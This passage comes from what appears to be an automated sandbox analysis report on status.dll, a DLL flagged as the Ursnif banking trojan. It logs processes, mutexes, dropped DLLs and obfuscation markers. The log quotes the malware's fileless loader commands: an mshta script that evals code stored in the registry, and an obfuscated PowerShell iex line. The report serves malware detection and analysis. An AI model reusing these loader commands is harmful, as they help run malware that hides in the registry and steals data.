Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFABD2BAAC7D7BDC70.TMP
Source: classification engine Classification label: mal100.troj.evad.winDLL@80/93@8/2
Source: C:\Windows\System32\loaddll32.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D2AB4 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 1_2_017D2AB4
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{F408F8B3-C39F-46C2-ED68-A7DA711CCBAE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{A446E4F3-B3E1-76BB-5D18-970AE1CCBBDE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{D456EBDA-23D4-26AB-4D48-07BAD1FC2B8E}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{ECD50131-5BD8-FE31-45E0-BF1249146366}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{0C9EE140-FBC1-1ECF-E500-5F32E9340386}
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{D47D1D27-23CF-266A-4D48-07BAD1FC2B8E}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{D8EBAF0D-57FD-CA7A-A18C-7B9E6580DFB2}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{700550A9-0FDA-2200-19A4-B3765D18970A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_01
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: status.dll Static file information: File size 1235456 > 1048576
Source: status.dll Static PE information: Raw size of .data is bigger than: 0x100000 < 0x121200
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D7DE0 push ecx; ret 1_2_017D7DE9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D81CB push ecx; ret 1_2_017D81DB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE06F5 push dword ptr [ebp-00000284h]; ret 1_2_00FE0764
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0AB8 push edx; ret 1_2_00FE0B11
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0880 push dword ptr [ebp-00000284h]; ret 1_2_00FE08B6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0A64 push edx; ret 1_2_00FE0B11
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0A64 push dword ptr [esp+10h]; ret 1_2_00FE0BFB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0BFC push dword ptr [esp+0Ch]; ret 1_2_00FE0C10
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0BFC push dword ptr [esp+10h]; ret 1_2_00FE0C56
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE05DF push dword ptr [ebp-00000284h]; ret 1_2_00FE087F
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B23713 push ecx; ret 1_2_03B23723
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D481CB push ecx; ret 4_2_02D481DB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D47DE0 push ecx; ret 4_2_02D47DE9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960880 push dword ptr [ebp-00000284h]; ret 4_2_009608B6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960AB8 push edx; ret 4_2_00960B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_009606F5 push dword ptr [ebp-00000284h]; ret 4_2_00960764
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960A64 push edx; ret 4_2_00960B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960A64 push dword ptr [esp+10h]; ret 4_2_00960BFB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_009605DF push dword ptr [ebp-00000284h]; ret 4_2_0096087F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960BFC push dword ptr [esp+0Ch]; ret 4_2_00960C10
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960BFC push dword ptr [esp+10h]; ret 4_2_00960C56
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_04903713 push ecx; ret 4_2_04903723
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_049031E0 push ecx; ret 4_2_049031E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA7DE0 push ecx; ret 5_2_04AA7DE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA81CB push ecx; ret 5_2_04AA81DB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C05DF push dword ptr [ebp-00000284h]; ret 5_2_031C087F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0BFC push dword ptr [esp+0Ch]; ret 5_2_031C0C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0BFC push dword ptr [esp+10h]; ret 5_2_031C0C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0A64 push edx; ret 5_2_031C0B11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0A64 push dword ptr [esp+10h]; ret 5_2_031C0BFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0880 push dword ptr [ebp-00000284h]; ret 5_2_031C08B6
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B039B2 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_03B039B2
Registers a DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
Source: initial sample Static PE information: section name: .text entropy: 6.95280203957

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
